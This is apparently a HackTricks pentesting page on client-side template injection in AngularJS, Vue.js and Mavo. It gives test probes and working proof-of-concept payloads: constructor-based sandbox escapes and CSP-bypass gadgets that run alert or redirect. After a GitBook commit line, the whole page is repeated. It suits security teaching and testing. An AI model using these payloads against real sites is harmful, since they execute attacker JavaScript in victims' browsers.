hacktricks/pentesting-web/client-side-template-injection-csti.md

# Client Side Template Injection \(CSTI\)

## Summary

It is like a [**Server Side Template Injection**](ssti-server-side-template-injection.md) but in the **client**. The **SSTI** can allow you the **execute code** on the remote server, the **CSTI** could allow you to **execute arbitrary JavaScript** code in the victim.

The way to **test** for this vulnerability is very **similar** as in the case of **SSTI**, the interpreter is going to expect something to execute **between doubles keys** and will execute it. For example using something like: `{{ 7-7 }}` if the server is **vulnerable** you will see a `0` and if not you will see the original: `{{ 7-7 }}`

### AngularJS

 AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the **`ng-app`** attribute \(also known as an AngularJS directive\). When a directive is added to the HTML code, **you can execute JavaScript expressions within double curly braces**.  
For example, if your **input** is being **reflected** inside the **body** of the HTML and the body is defined with `ng-app`:  **`<body ng-app>`**

You can **execute arbitrary JavaScript** code using curly braces **adding** to the **body**:  

```javascript
{{$on.constructor('alert(1)')()}}
{{constructor.constructor('alert(1)')()}}

<!-- Google Research - AngularJS -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
```

You can find a very **basic online example** of the vulnerability in **AngularJS** in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)  

### VueJS

You can find a **vulnerable vue.js** implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)  
Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor%28%27alert%28%22foo%22%29%27%29%28%29%7D%7D)

And the **source code** of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)

```markup
<!-- Google Research - Vue.js-->
"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
```

### Mavo

Payload: 

```text
[self.alert(1)]
```
GitBook: [master] 351 pages and 442 assets modified 2020-07-15 15:43:14 +00:00			`# Client Side Template Injection \(CSTI\)`

			`## Summary`

			`It is like a [Server Side Template Injection](ssti-server-side-template-injection.md) but in the client. The SSTI can allow you the execute code on the remote server, the CSTI could allow you to execute arbitrary JavaScript code in the victim.`

			The way to test for this vulnerability is very similar as in the case of SSTI, the interpreter is going to expect something to execute between doubles keys and will execute it. For example using something like: `{{ 7-7 }}` if the server is vulnerable you will see a `0` and if not you will see the original: `{{ 7-7 }}`

			`### AngularJS`

			AngularJS is a popular JavaScript library, which scans the contents of HTML nodes containing the `ng-app` attribute \(also known as an AngularJS directive\). When a directive is added to the HTML code, you can execute JavaScript expressions within double curly braces.
			For example, if your input is being reflected inside the body of the HTML and the body is defined with `ng-app`: `<body ng-app>`

			`You can execute arbitrary JavaScript code using curly braces adding to the body:`

			```javascript
			`{{$on.constructor('alert(1)')()}}`
			`{{constructor.constructor('alert(1)')()}}`

			`<!-- Google Research - AngularJS -->`
			`<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>`
			```

			`You can find a very basic online example of the vulnerability in AngularJS in [http://jsfiddle.net/2zs2yv7o/](http://jsfiddle.net/2zs2yv7o/)`

			`### VueJS`

			`You can find a vulnerable vue.js implementation in [https://vue-client-side-template-injection-example.azu.now.sh/](https://vue-client-side-template-injection-example.azu.now.sh/)`
			Working payload: [`https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor(%27alert(%22foo%22)%27)()%7D%`](https://vue-client-side-template-injection-example.azu.now.sh/?name=%7B%7Bthis.constructor.constructor%28%27alert%28%22foo%22%29%27%29%28%29%7D%7D)

			`And the source code of the vulnerable example here: [https://github.com/azu/vue-client-side-template-injection-example](https://github.com/azu/vue-client-side-template-injection-example)`

			```markup
			`<!-- Google Research - Vue.js-->`
			"><div v-html="''.constructor.constructor('d=document;d.location.hash.match(\'x1\') ? `` : d.location=`//localhost/mH`')()"> aaa</div>
			```

			`### Mavo`

			`Payload:`

			```text
			`[self.alert(1)]`
			```